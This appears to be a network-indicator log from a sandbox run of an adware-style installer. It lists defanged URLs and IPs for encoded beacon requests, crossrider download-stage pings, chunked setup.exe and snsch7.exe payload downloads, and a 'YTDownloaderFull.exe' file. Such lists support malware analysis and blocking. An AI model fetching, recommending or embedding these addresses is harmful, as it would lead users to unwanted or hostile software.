hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=j7YMo/n29XMVCZIctrluXs30ehTmVX1mzeUpkoQZA95XGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRp1pO0uZjbwWll7Nx/213VNE6JXbpA88dZXJ6A7OzALu5zbBYCuaAtAvGkllEOJq0sp3jz2it1PuY hmSQlakOO/yw2dOqRz0VTJIBlhaXll/jgb6v7cXpPsHbyM38hHiddP9Uf4p/RQ UMx9TNBbmkTjcSbV/8/K3y93eDbW4 bAU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0adaTtLmY28FpZezcf9td1TROiV26QPPHWU1VVI0/LSiBw== 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=j7YMo/n29XMVCZIctrluXs30ehTmVX1mzeUpkoQZA95XGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRp1pO0uZjbwWll7Nx/213VNE6JXbpA88dZXJ6A7OzALu5zbBYCuaAtAvGkllEOJq0sp3jz2it1PuY hmSQlakOO/yw2dOqRz0VTJIBlhaXll/jgb6v7cXpPsHbyM38hHidfzjtSC7/eFaNh3QJEALW3T8P/xsh451fiSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkZExocXcgC5365nTl0wIYvEx07U7eKz/qL38Km4JMgAXQ== 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=N6dOqWm8Q95rOakOyNRzsN5jOExRmJjcpL1q0D3vvXQ2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0DOGtgSBCtpWMnNHFDGURlx2SsMiXJFnYjCD6AQoJRo0ATae6NSkcvIROPie2z40 X0A62pnUj3KYX3Ti/i3YOBks urBi 1VbQfHq0QVBDarxXN1e/eRVfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUu51CUbXbhryEU5MDCXDxgXe5MFczVjq37oq04ZzslgqiCybfiaspbZ 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=N6dOqWm8Q95rOakOyNRzsN5jOExRmJjcpL1q0D3vvXQ2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0DOGtgSBCtpWMnNHFDGURlx2SsMiXJFnYjCD6AQoJRo0ATae6NSkcvIROPie2z40 X0A62pnUj3KYX3Ti/i3YMtu6Il6K42s07l01ouN0CW2hnxCMb9MQTrbPokHTCrpfDVXG8fnVsUkXiRAgddMCaMVoLWI3pNMYIaukc1i7BWldmt6Vgk8tSuaFT9xqmWN6c2C4KGeMVjZ4jzc3YjAmYShy1QgM mULHn4xNjI6qV2YCgKhxKgoU= 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=c0XmKevqA0lENRlsCDLYcGeakDLP0HwkgDEcVfgp paILtUXHuyvMn5dMiu8MPG0G04r2GZQbxA4k4Gm5vvSsk7q1DqDoShwFmblcMjHXReA74CIMkIVuBTjoJMNpFu87wf8xFonEcPDYfiiZa9KEdPIgADxit2gnbJKYwPfuhCWcSucRpHa5xQC drCF7eFc68xQtOPoFeZZ3F95gs6nEVdjbbwQnHyVtB8erRBUENoBUzXpAW/ CSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkZExocXcgC5365nTl0wIYvEx07U7eKz/qL38Km4JMgAXQ== 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=j7YMo/n29XMVCZIctrluXs30ehTmVX1moiejxERrnrFXGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRp1pO0uZjbwWll7Nx/213VNE6JXbpA88dZXJ6A7OzALu5zbBYCuaAtAvGkllEOJq0sp3jz2it1PuYvKyHshi0NtNKXe7b3ey81Z7hCmg7VZxoKYX3Ti/i3YPRE4iM0F3Z8SSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkZExocXcgC5365nTl0wIYvEx07U7eKz/qL38Km4JMgAXQ== 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/15359.ashx?e=eFCD8T/coiezrE/yDXLQyd5jOExRmJjcfsQaZZXSd Q2fVsQFDtppP2TEkHeJNDUDPI5dGTWg7 SOxGOFR1rQ7/gCVcfJT7Zd/XCztdoPbJFiFlIaXxqEcmxw368usKjvx7ENkzRxOw/caEgn1aywgBPaL3foawtkjneDvF7aJsyFrdg9Bz4vxjVxaO/jmdPBGRotN0ABYeEjtD/tYznR 0LhpxXD4t4eCmOKii sWrz7yH4dpDjMWLUJGnTsXhlEK5u6pECdO1SxiNrRjAGZBB5aSy JFSFglNuW4n71dQey68r 4NN8VyKsbjLeBp4dMm3hqMstJ/y06twORtLg9fHR9A6p3upOM0S4XWXQNckrM9d9qKvEEB2Ep7ddBI2V0TFaJ4cExkLJWSC3b0K eCko9DIyNsADn6EXOLggZKypkVJN3kXvFA4InH5qGL6TgskKX3SgwYohnxsdae b8EiI8s6T8qHsyKop7n4S NokPwegfs5DA6y2ObHsF4aVuJuMr 09WnXl3jXxrL4WWiPc6F0Foo3zqD0Un5LpMl6Vac8KKMKQ dvxgza/aJvlagtVicvngwklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CaR2deZjme0S 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=W5y9y1UrGBkT/daslwwbUi1X0eix9R7PaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVUOgPoSQeroSQMPOYURUu2BNfh4qpckIN6kO9/DuORuprIIa1xct7ImOrIk6OakHpXG9WQc5JBBFaACykertHSFfOKWYd4uGNAB/MXM5vy8Es IILilpWF3E4CvODJISMmgJ1E0DOBKFm3OtmTG7fpbuOInD4IpbV04k1C4lssAWX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF3uTBXM1Y6t 6KtOGc7JYKogsm34mrKW2Q== 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/10266.ashx?e=NdvkYMTo1KsT/daslwwbUrln8Tc7JdzDaMzgTHP7UuxxTYwWxYG9WM2wWArmgLQLxpJZRDiatLLr8onAm2k8 UCN9h bV19VdXQO8eCkzNk9LWPkwGrB/imF904v4t2DTTuHrYVulo109x0h yMmOuOY6cLwcbD07lG1xkeY5jbRwdqu9soHjYgwamV62X9gO95zWp5ecIePiKgomzd5XT9xoSCfVrLCPk3SNaw1Hwyh7Gcj1ILXhdtXANK2UVVldUmBhCw8CHnrErQ9Bnn0aGNDEgQGSeDWcuFD/oqMC4ywj137NFRjrrStcIq/vZyTdriV4mPeB3fQbFCQv5BK9FdmE/yeJSe6i5CWtbGsRuHfTuvFpnVrlF9LGvMrDlXCLGhXnLEz5pbP YAvZ/SRS XEWbcA1chWcCJK1OHTiKZmXIkKgXd7TGpnBktR0W195FKDVXPs8UDrf7gVRTtqGyUpmLFbLFiWF8xS3bBaukC3g671NSdAWbPZE8t0P6yGa vpLH0m0oO jwDV6udpLox4w9PSLDKW3MoS/fu50NKaR9WivOCmrDK2XoJ06HUM62z6JB0wq6Xw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTHRdsGMkr9o5Q== 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=Feo0TQZfu6KSwU3ck0YwnkQ1GWwIMthwsNv oCoFDuAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRbrsFepywjbPfV9OCtHXZfA3mXJEY39mHAhwsRGINruhhsseF9XKGr8l4l5 9UEJ lex/kVKG eu03e5/1jzsDq/1bjUefs49JU1ySiay1sqdymVuPyjsZ40oQa07NiSGd51jxu8kbC2zsHlRkWrcy9e991jqD0JbjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVUOgPoSQeroSQMPOYURUu2AUI/TbDoS6cQ== 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=Feo0TQZfu6KSwU3ck0YwnkQ1GWwIMthwsNv oCoFDuAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRbrsFepywjbPfV9OCtHXZfA3mXJEY39mHAhwsRGINruja7CNvvxDM30ViblVFPL pCuWqMo7ZG/Qxztg6 4zwmphq5YRs3Ua3kOLZWZ3INLBBsDkaVI3Au2 WNxArStCUlpNEzah78fl5Xe6ZTKO9HKqfV3Ow7bWoU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0adaTtLmY28FpZezcf9td1TROiV26QPPHWU1VVI0/LSiBw== 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=2fVCHF6kf8jCiOnT8Um5ot5jOExRmJjcwBNQmbxWl5I2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0DOGtgSBCtpWMnNHFDGURlx2SsMiXJFnYjCD6AQoJRoA0zlVyT prKPFGXl7hYw KKij 6dP1w7xUocEPa3glNDBcek3F/63nckoxBum7JNDqm5t3h0H90W4JQdY9P0gBy5EtCsvUaNdTeugB sfRAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JjlkwUaFySc/6ysA rfm9WUeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0l7tPOkkeUv 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=obiBp3WOda9tb/LgACKPGkQ1GWwIMthw2qShU7Jjo1uAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRAKcFpVLy3NZgKkdlz1lRofr/zw3mMKgg0JQd5HxgIXcyW34jq/xhC69GO739HYqB8SJA d bWCFeYyujkXy401 gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBd7kwVzNWOrfuirThnOyWCqILJt Jqyltk= 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=1ZEnpGuz/ISSsSz5Gin3Vt5jOExRmJjc8f9/KvgcVLM2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0DOGtgSBCtpWMnNHFDGURlx2SsMiXJFnYjCD6AQoJRopynfaNYH8L/fV9OCtHXZfA3mXJEY39mHAhwsRGINrujU8aLWOIyJUH8YWruN4e6MEbymkiujpsVTxWhzXOleYJkIdnqYjudekgj0wc9eDMUnCmQO3a9dMJOXaRLeTy 6CAOOMT3NqqJO9TngHSIOj44034t1Q4pu3fndBZnH/Wk11N66AH6x9ECOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndFPhdC l28/ a9Ya/86pUpQ3MNfQbUufSXu086SR5S8= 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/15359.ashx?e=ZfTZC8DxP8YF7tXbo2OpjW4qNgpZFK9FKB2ZKuKuT4UgLxC0aXqYrUEev CIr75kJRiOVUDkXyNETAlhmitFcoBTqgRg0M9kCy5U1DKQBR/1HrjuYPfZlNCUHeR8YCF38sTNuKvNOs5qISpLPhmveuzfeVbSlzknygSzf6SEdqUj0Olzxy0WCFP u/7dSCX0U7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ= 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/10266.ashx?e=ZfTZC8DxP8YF7tXbo2OpjW4qNgpZFK9FKB2ZKuKuT4UgLxC0aXqYrUEev CIr75kJRiOVUDkXyMp9bfbo1 pjYBTqgRg0M9kCy5U1DKQBR/1HrjuYPfZlNCUHeR8YCF38sTNuKvNOs5qISpLPhmveuzfeVbSlzknygSzf6SEdqUj0Olzxy0WCFP u/7dSCX0U7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ= 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/YTDownloaderFull.exe 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=c2mW1WEUbCET/daslwwbUogIgfgifRkfaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVUOgPoSQeroSQMPOYURUu2BNfh4qpckIN6kO9/DuORuprIIa1xct7ImOrIk6OakHpXG9WQc5JBBFclHT2qvGHts3SQCeXx1TCLUISLCJlFqul4CnWC C4vHu2csK9H8/A3AVeGnpHjBs0JQd5HxgIXcvF5YR0KhEBdvPLr6VHnfYX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF3uTBXM1Y6t 6KtOGc7JYKogsm34mrKW2Q== 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=ZfTZC8DxP8YF7tXbo2OpjW4qNgpZFK9FKB2ZKuKuT4Xezmr5wsXHLCEdbCsTxXU3qJDnlUORNKJFgAYD7IlOObhfXDxmrTSK7QblguX5JvoeC1e2SDVtV0Et4u7lqt3sALWQVKcMZfCF1xI06rglXZ6Eeh5vZKO2eqfOL09Waq7Jn1GegIILyOsrHZsRsIfMRhg0WUsz0Xly/L51iHZ9r5N1eAbd3t0uTl0SfHFTsacMteo8rnbW10COCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndFPhdC l28/ a9Ya/86pUpQ3MNfQbUufSXu086SR5S8= 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/9313.ashx?e=KSz5qzb2KgILjT49fHfOTEy1U5i0Jcc8jvdcLv9L0ULeyzV7AofXlljJzRxQxlEZcdkrDIlyRZ3 QFrihM290CN9h bV19VdXQO8eCkzNk9LWPkwGrB/imF904v4t2DTTuHrYVulo109x0h yMmOp6IOl1JW3sHB9kWS7dXZ6elIsRF9MX88CO265/Kjb 488/XPfhk4uBUiNRLLAgct5oMOyZur3pkEghD3HnQv1a/gCZD66/sdSVKFBzVQWjB05oujAfFWpTOgMsHybNe40DPXjVNm at3mAerssgcNWUIia6WITopWDcT qioK0TvO7tQdS7Pb5LlxRWf0cqGrN/G5zN QDpcSQHkYgFaOBv7DByqGp2noDEWmBK24T6wUFUm6AwzmaIYfI6O6ruLd0T1shsZ 3kYZJCvGTB0II76PaOLcDiT6i7uu4ZLp9tYOQ0C4B6wOMHFWmaAPLjzUoonoBGYhxQckdTtpt CJE/NAFMRO0hJ42ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDLLNMXZjRZW4= 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/11153.ashx?e=NVqRyNkruooT/daslwwbUvMtz3dZh2P6aMzgTHP7UuxxTYwWxYG9WM2wWArmgLQLxpJZRDiatLKZwV0mx4LJvkCN9h bV19VdXQO8eCkzNk9LWPkwGrB/imF904v4t2DTTuHrYVulo109x0h yMmOp6IOl1JW3sHB9kWS7dXZ6elIsRF9MX88CO265/Kjb 488/XPfhk4uBUiNRLLAgct8wjjUrZ/qJkmB0RNQ 9BzBNqeRPeOqgjazACGY CgK6eqXaZH4mK3kqgSNqV7u8iR3AQSpIJXB7L4uKB8G6McV84RHzLnn1bXMAwyoiKXvjmRmxRGf9zFEKY/VNO/cxtzOS6jq UbgqBz1jcZZbz05IQbYQvC6sk0cdVK5OLpFHVdPwqUuqOwA003r2uKrGnlnotumY2YUYLnl7FCVUbw972nxHK4nudtK7r9jGEfZIEoRN 6ZHvZxCVNbsRxhip/uvaFUgbktt1b8Epic0SPi6TzbxlgO9RcTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5emS9jXjFgnw= 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=QHucCbLl /YLjT49fHfOTKA34GYfZJUsjvdcLv9L0UIbIGZvOdVpu1XTUggPGJK SlCyq068/M1FOTAwlw8YF3uTBXM1Y6t 6KtOGc7JYKogsm34mrKW2XwF8xC533FcDPI5dGTWg7/iOZEO6FSB/sV8mKKVLIm1QG1CxyaZxv/Uh 3ZGDmdW5pZis9f nTddyS4BuUDC9WTdXgG3d7dLk5dEnxxU7GnDLXqPK521tdAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JjlkwUaFySc/6ysA rfm9WUeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0l7tPOkkeUv 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/9313.ashx?e=wlkQ3WKgYpSXQ02 mivEAEQ1GWwIMthwtyLw6hNuJQGAMRxV Cn6lnsc7hbJtTJHDHGXB7YFOPH7H OCiIJdXc LjjRvaSA4fJsKHIM1ro1Fhap1svS6Dz9hP8ILQ7STKYX3Ti/i3YOeiDpdSVt7BwfZFku3V2enpSLERfTF/PAjtuufyo2/uPPP1z34ZOLgVIjUSywIHLeaDDsmbq96ZMtJ XAicqhKxNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi fl6ZL2NeMWCfA== 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/11153.ashx?e=4mC0vXGWFtoJz2TpdH2qbEQ1GWwIMthw7wq1eibGVAGAMRxV Cn6lnsc7hbJtTJHDHGXB7YFOPH7H OCiIJdXWPgIqkg/KntpjkZwwc6dH53FRTfUsruhOl6T0Yw8cmQjgb6v7cXpPu93RkgrfPIdK/1bjUefs49JU1ySiay1sqdymVuPyjsZ40oQa07NiSGd51jxu8kbC0X1dGgWnCEBcBeHgs9Q765QI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiaF8KpepynoFA== 198.232.124.192
hxxp://errors.crossrider.com/utility.gif?error=start&report=mini_s&ver=1729&action=na&ms_vr=3&clock=15&rnd=18514 208.85.150.249
hxxp://errors.crossrider.com/utility.gif?error=start&report=mini_s&ver=803&action=na&ms_vr=3&clock=0&rnd=18514 208.85.150.249
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=803&i=10&n=ms_started&rnd=19871 208.85.150.249
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1729&i=10&n=ms_started&rnd=19871 208.85.150.249
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=803&i=20&n=ms_start_download&rnd=16011 208.85.150.249
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1729&i=20&n=ms_start_download&rnd=16011 208.85.150.249
hxxp://cds.c5z6s5a3.hwcdn.net/web/gf/all/setup.exe_c
hxxp://cds.c5z6s5a3.hwcdn.net/web/gf/all/setup.exe_d
hxxp://cds.c5z6s5a3.hwcdn.net/web/gf/all/setup.exe_e
hxxp://cds.c5z6s5a3.hwcdn.net/web/gf/all/setup.exe_b
hxxp://cds.c5z6s5a3.hwcdn.net/spdbt/shoppy/snsch7.exe_e
hxxp://cds.c5z6s5a3.hwcdn.net/web/gf/all/setup.exe_a
hxxp://cds.c5z6s5a3.hwcdn.net/spdbt/shoppy/snsch7.exe_d
hxxp://cds.c5z6s5a3.hwcdn.net/spdbt/shoppy/snsch7.exe_b
hxxp://cds.c5z6s5a3.hwcdn.net/spdbt/shoppy/snsch7.exe_c
hxxp://cds.c5z6s5a3.hwcdn.net/spdbt/shoppy/snsch7.exe_a
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=803&i=30&n=ms_download_success&rnd=25343 208.85.150.249
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1729&i=30&n=ms_download_success&rnd=25343 208.85.150.249
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=803&i=35&n=ms_about_to_exc&rnd=25324 208.85.150.249
hxxp://rep.shopper-pro.com/app/ping.ashx?e=KC52kqqAunAF7tXbo2OpjYavQM3IkVbX2YTeaOaZJPFysSIQM/WMqhsgZm851Wm705cEc0dFwLhTxWhzXOleYCZCp63jGZtjv06NRyXKgtkdRS7ocO43fkEXlTeNLX sfKwlC2TeCg7lnoGCEF1IIyQxWeZ2hMdUZrdGZ5CXclVTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05PNsA1iuxLaBHdtdgGHkZrI4k4Gm5vvSsk7q1DqDoShwFmblcMjHXRdicB7EPPnRdOUS4717SFgKd6j7/wRBDsRoqvWX6JwkejqMehRdfaX6iZYn8TH3Pe3MlW9RFqOniqVRDsrPlqwdmkLLb35jLfrVLutmednZNQ== 54.197.238.106
hxxp://rep.shopper-pro.com/app/ping.ashx?e=j7YMo/n29XPJd3Cl8WpRrt5jOExRmJjcO2zR9ArYI84icvsFwQStENB87jgWTbK/3s5q cLFxyxYWD4MTU1ewbPSKLqmmOmOblFuMGpJvGKIJGNp/ 1I9GCArG4HtKvdX1gPBPGd4Gf2NRySioDRRk/1J3P8veFvLH4IoLPLWWwmPRXV7cLSOcTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5JDr9I5ZW0pTpBU9U/r/dsNyvhlGeipNVQ6A hJB6uhJAw85hRFS7YMmYLvqrm5 34uZ/p4emFS3nW9YwSk5gj28Va7JmIs/Bl13yhrpfYAMeIGfrzyWRyvy2gKbXyPPDXUoXAX2Uiz3W6sPFKrniC4jaKTJ4Po/ 54.197.238.106
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1729&i=35&n=ms_about_to_exc&rnd=25324 208.85.150.249
hxxp://rep.shopper-pro.com/app/ping.ashx?e=Ka qOJkckoXHjWHokC5IQKgWR 5S3q5q62ls PLHCLDT03ZwnpMmrnnHkVEbFY2mhwr4VlWkO0yul9pd4H5jC6/NyPZdyyiin/GGy8byFgpgKkdlz1lRoYK03JXbbVmAY0ZRB54QLU9s0DpOFQBDKtJMHu88K1rwaE3O18WF9F0d212AYeRmsjiTgabm 9KyTurUOoOhKHAWZuVwyMddF6Z1N9JE36WiiCgXFJE54ba3yZbyqF02 D1Q ijBQ9I1GFvOpVsOwzzvGXsyNILdq6t9GbH/wnaf3AtLPqBYAg4fnTdJhi/F jqL/OPRls1am988pbBE198Bbak1i16fYytqnU4k0fribeIhZIOGE9621TzruYcSjl gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFDMWtlnh6ykf3xLsYR5HcB6c2C4KGeMVjZ4jzc3YjAmYShy1QgM mULHn4xNjI6qV1hbcceYGEhwEchBIBSL pnq6LeO//ew/cRstaZMh7oc9Jm6LOUplLi9UaJ0lDNBvBxfXneO6iyXLvPTXiM8YeL1JXfzjhvHW 54.197.238.106
hxxp://rep.shopper-pro.com/app/ping.ashx?e=2UW/O98m6H8F7tXbo2OpjW0n2MBpLjeO2YTeaOaZJPFysSIQM/WMqhsgZm851Wm705cEc0dFwLhTxWhzXOleYCZCp63jGZtjv06NRyXKgtnU2Z1SyzBY81o8H6qezB8RqTFlxlzn4VKX1U8GGWeNj61SjtAHPTC3QI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiYoYL3r 4idOA8Kj6Mu8v3vRYAGA yJTjm4X1w8Zq00iu0G5YLl Sb6QG6vuKMEZ8b/AUix4dIkZvQPHab7QXjtoXNw24za1vD4WpTRkXhg7nV3/LPfa2aq5oeRu5C4CqkWleu6Ut5wZJLhm4jKngLIPSVmnMg23wA= 54.197.238.106
hxxp://errors.crossrider.com/utility.gif?error=mem_strt&report=mini_s&ver=803&action=na&ms_vr=3&clock=15000&rnd=20529 208.85.150.249
hxxp://rep.shopper-pro.com/app/ping.ashx?e=WL9usJOVMsPXmto/P2xI1pGfa3o7qc5t56XqnYmheUgSZTerw9Y85dVUaX7QH4byIYSfA6BN7OBJ4GPHeEFvMkF5ezSia8QQf4SJJgI1sB24ZvM W8i8tdtgpjL3X7N9nl1xOKDZuhXrGiiXWYz3NvgrB1VZh8CMsYns0spGP2dTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05PNsA1iuxLaBHdtdgGHkZrI4k4Gm5vvSsk7q1DqDoShwFmblcMjHXRdicB7EPPnRdH5TN3b4ooc0d6j7/wRBDsRoqvWX6JwkejqMehRdfaX6iZYn8TH3Pe3MlW9RFqOniqVRDsrPlqwdmkLLb35jLfrVLutmednZNQ== 54.197.238.106
hxxp://errors.crossrider.com/utility.gif?error=mem_strt&report=mini_s&ver=1729&action=na&ms_vr=3&clock=15890&rnd=20529 208.85.150.249
hxxp://rep.shopper-pro.com/app/ping.ashx?e=WL9usJOVMsOEyHZoFFyrCAXu1dujY6mNj6To0cJP4sHZhN5o5pkk8XKxIhAz9YyqGyBmbznVabvTlwRzR0XAuFPFaHNc6V5gJkKnreMZm2O/To1HJcqC2WadpT4UtSGCs4164GCUCrHofaoyXCfoQHfnxDGMvPkm88zk3vjcmKS6F3bO0r3toDYVc3vn XSLjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsNd jErBGkiDqZpQuUsyuErvSm4upuKAkZExocXcgC5365nTl0wIYvEx07U7eKz/qJg4GZE0lzROYY2d48H/jH53sGqR1dd1 CYgbDq2EyqHZXiNwermIPJaqcLsqnN14kxDoAIuanBxUzm JXfFf4aShZXLko8QlU= 54.197.238.106
hxxp://rep.shopper-pro.com/app/ping.ashx?e=WL9usJOVMsOEyHZoFFyrCAXu1dujY6mNj6To0cJP4sHZhN5o5pkk8XKxIhAz9YyqGyBmbznVabvTlwRzR0XAuFPFaHNc6V5gJkKnreMZm2O/To1HJcqC2VX2gru9mb3lVEZbv3odR7drnS7dfKKClSmRgGcjsyyBKl4uaJsEWT1rk4Satsm2USSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJJI2sziJUfUjYt3Zg/aKemGVSvOHNjNGnWk7S5mNvBaWXs3H/bXdU0ToldukDzx1llVhPQP8X9sNG9pOkZ/PfGFwkoLVF6jef2zYWz6DzTPSToKv2VpIXZetFtmcGfLS6G/eITPVk2cBiFIt/eCwnOFhZWN4UpKuAnAhg 6mBvfU= 54.197.238.106
hxxp://rep.shopper-pro.com/app/ping.ashx?e=WL9usJOVMsOEyHZoFFyrCAXu1dujY6mNj6To0cJP4sHZhN5o5pkk8XKxIhAz9YyqGyBmbznVabvTlwRzR0XAuFPFaHNc6V5gJkKnreMZm2O/To1HJcqC2TQDvlMwbi/4Fsp1Rvh9JTeKcWyRatcCZS5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAc/1td01976VC51CUbXbhryEU5MDCXDxgXe5MFczVjq37oq04ZzslgqiCybfiaspbZo2Pjw4zIP8Koiz5XsOzoJG5lkiLn 2iON4UrLMQQDZPMFopdoQp3MXCrArhn8sH AS7DCm3ZJZeNpBJRUpe7bX0UJxZodl69 54.197.238.106
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=100&n=init_start_funnel_step_name&rnd=1439464835
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=100&n=init_start_funnel_step_name&rnd=1439464836
hxxp://dl.maxdevzone.com/web/gf/all/setup.exe_e 69.16.175.42
hxxp://4g3dwvcs2-zxis6jz8.netdna-ssl.com/27136.ashx?e=xY8ohDYpM iI4k8LaFSbf2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMDqVqSY7buIRtCUHeR8YCF3BQ8MIYMfS0tAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JjlkwUaFySc/6ysA rfm9WUeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0l7tPOkkeUv 198.232.124.192
hxxp://dl.maxdevzone.com/web/gf/all/setup.exe_a 69.16.175.42
